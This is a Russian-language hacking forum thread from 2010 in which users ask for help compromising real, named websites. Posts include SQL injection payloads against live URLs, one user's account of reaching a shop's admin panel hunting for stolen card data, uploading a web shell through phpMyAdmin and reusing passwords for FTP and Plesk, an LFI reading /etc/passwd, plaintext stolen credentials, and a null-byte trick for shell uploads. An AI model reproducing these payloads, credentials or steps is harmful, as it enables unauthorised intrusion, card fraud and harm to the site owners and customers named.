Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DavletAG

    DavletAG New Member

    Joined:
    20 Aug 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
    выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1


    И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)>1 проходит нормально,
    а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)

    UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?

    UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))

    UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?

    UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?
     
    #14621 DavletAG, 25 Aug 2010
    Last edited: 25 Aug 2010
  2. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://as-roma.ru/team.php?id=61+order+by+15--
    алерты как раскрутитЬ?
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Попробуй здесь посмотреть
     
  4. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Подскажите пожалуйста, как раскрутить LFI на сервере с FreeBSD? Цель - залить шелл. На никсах знаю, через environ, но на фрях это не катит (или я не там смотрел?)...есть ли какой-нибудь хороший и главное понятный ман по раскрутке LFI на различных ОСях?
    Заранее спасибо...
     
    #14624 z0mbyak, 25 Aug 2010
    Last edited: 25 Aug 2010
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://as-roma.ru/team.php?id=61+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
    Вот поля. Видимо слепая она.
     
  6. DavletAG

    DavletAG New Member

    Joined:
    20 Aug 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php
    В чем проблема?

    UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок :D
     
    #14626 DavletAG, 25 Aug 2010
    Last edited: 25 Aug 2010
  7. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    z0mbyak, почитай тут
     
    1 person likes this.
  8. DavletAG

    DavletAG New Member

    Joined:
    20 Aug 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    UPDATE2: FTP шняга. Получил доступ к Parallels (PLESK) по порту 8443 вот это п****ц
     
  9. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    а можно ссылку на статью, гугл не находит
     
    #14629 durito, 26 Aug 2010
    Last edited: 26 Aug 2010
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Можно: https://rdot.org/forum/showthread.php?t=60

    Только метод этот не мой, попрошу мне чужие заслуги не приписывать :)
     
    2 people like this.
  11. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://www.romanchuk.com.ua/login.php

    расшифровал, но зайти не могу почему-то((
     
    #14631 Lilo, 26 Aug 2010
    Last edited by a moderator: 26 Aug 2010
  12. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Приветствую, маны почитал, вроде даже понял, но раскрутить не могу...
    http://mzrd.ru/?f=%2fetc%2fpasswd%00
    Пожалуйста, ткните носом...
     
    #14632 z0mbyak, 27 Aug 2010
    Last edited: 27 Aug 2010
    1 person likes this.
  13. aces007

    aces007 New Member

    Joined:
    24 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Пароли сохраняются в /etc/shadow
    Но прочитать не получиться прав не хватает.
     
  14. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет. Есть инъекция: http://www.swazicandlesusa.com/support/links.php?catID=22+and+1=0+union+select+1111,2222--
    Пароли в plaintext-е:
    Dapo5716?:eM58478
    jim@macpor:h9$@JL3
    Админка в /admin/. Как залить шелл?
     
  15. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Чувак, все как на ладони! У тебя есть сайт с шелом? после знака = ставь ссылку на шелл
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ЧУВАК а не думаешь что нужно много слyшать и мало говорить?
    там читалка,шелл залить не получится, только читать конфиги если что..
     
    _________________________
  17. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Лей в
    Зацени, в "Birds and Fish", чет у меня не очень получилось...
    К тебе это тоже не относится!
     
  18. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Что лить? Там вроде как картинки заливаются
     
  19. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    wso2.php%00.jpg или как-нить так...
    А еще лучше попробуй с этими же паролями к фтп законнектиться(если он там есть)
     
  20. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    к фтп не коннектится, код в картинке залить не получается :(
     
Thread Status:
Not open for further replies.